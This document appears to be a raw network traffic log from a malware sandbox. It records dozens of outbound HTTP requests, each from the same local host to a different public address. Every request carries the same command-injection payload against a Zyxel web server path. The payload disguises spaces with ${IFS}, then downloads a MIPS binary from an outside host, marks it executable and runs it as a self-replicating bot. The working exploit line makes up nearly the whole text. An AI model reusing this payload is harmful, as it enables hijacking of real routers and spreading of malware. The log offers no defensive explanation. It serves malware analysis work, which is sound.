                                                Jan 12, 2024 18:16:26.529716015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5261192.168.2.2341032182.145.50.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529759884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5262192.168.2.2346470174.142.0.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529772043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5263192.168.2.235604248.187.99.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529812098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5264192.168.2.2338100143.62.203.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529865026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5265192.168.2.234700041.10.0.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529906034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5266192.168.2.235857672.96.243.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529937029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5267192.168.2.234296223.55.198.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529972076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5268192.168.2.2358390129.37.68.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530009985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5269192.168.2.2345042216.19.235.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530031919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5270192.168.2.2338786190.102.11.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530067921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5271192.168.2.2343600174.110.237.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530102015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5272192.168.2.233506868.77.50.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530128002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5273192.168.2.2357910212.61.113.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530168056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5274192.168.2.2339550167.27.174.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530209064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5275192.168.2.234887895.206.96.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530249119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5276192.168.2.2340382182.14.250.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530303955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5277192.168.2.2337384155.30.39.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530353069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5278192.168.2.234755023.42.176.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530379057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5279192.168.2.234492650.132.110.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530405998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5280192.168.2.233641263.148.81.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530456066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5281192.168.2.2333384112.107.46.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530507088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5282192.168.2.2360010124.66.255.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530539036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5283192.168.2.23356309.130.31.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530570030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5284192.168.2.235698639.141.207.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530616999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5285192.168.2.2336170151.93.111.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530674934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5286192.168.2.2333506120.75.9.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530730963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5287192.168.2.235794224.227.58.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530752897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5288192.168.2.235130289.146.158.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530795097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5289192.168.2.235372843.73.35.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530831099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5290192.168.2.2352774192.212.203.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530884981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5291192.168.2.233813823.166.234.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530906916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5292192.168.2.2355110150.149.115.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.530957937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5293192.168.2.2344866114.120.86.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531008005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5294192.168.2.2360206163.107.111.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531054020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5295192.168.2.2353676202.7.56.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531091928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5296192.168.2.233657453.121.150.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531117916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5297192.168.2.233405452.124.185.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531148911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5298192.168.2.23583784.163.171.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531193018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5299192.168.2.235872873.100.227.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531209946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5300192.168.2.2350692149.98.164.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531270027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5301192.168.2.2340414106.0.247.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531301975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5302192.168.2.2334092149.76.211.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531347036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5303192.168.2.2353774158.13.118.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531384945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5304192.168.2.234967493.200.9.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531420946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5305192.168.2.23342488.129.175.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531462908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5306192.168.2.234010289.63.240.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531497955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5307192.168.2.2360946129.74.103.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531527042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5308192.168.2.2355052209.9.228.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531578064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5309192.168.2.2343774222.182.63.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531611919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5310192.168.2.233647459.255.192.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531672955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5311192.168.2.2350726190.35.136.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531712055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5312192.168.2.2338270170.184.160.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531761885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5313192.168.2.2339848196.31.28.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531802893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5314192.168.2.2335612117.138.22.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531829119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5315192.168.2.2359896182.125.156.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531877041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5316192.168.2.235790273.180.223.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531912088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5317192.168.2.234973239.116.178.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531940937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5318192.168.2.234300658.72.128.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.531974077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5319192.168.2.234053632.46.172.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532011986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5320192.168.2.2356070169.116.254.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532073975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5321192.168.2.2360380203.210.74.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532128096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5322192.168.2.2349064210.95.117.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532167912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5323192.168.2.23427785.166.48.107443
                                                TimestampBytes transferredDirectionData
